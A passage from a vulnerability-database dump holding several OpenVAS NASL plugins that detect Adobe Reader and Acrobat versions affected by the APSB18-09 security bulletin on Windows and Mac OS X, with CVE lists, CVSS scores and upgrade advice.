"CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813231", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2107 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813231\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader 2017\n and is prone to multiple 
vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:52", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813238", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813238\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed 
with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813232", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813232\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This 
host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813233", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813233\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host 
is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4946", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813241", "type": "openvas", "title": "Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Mac OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader DC (Classic Track) Security Updates (apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813241\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4946\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader DC (Classic Track) Security Updates 
(apsb18-09) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader DC (Classic Track)\n 2015.006.30418 and earlier on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader DC (Classic Track) version\n 2015.006.30418 or later. 
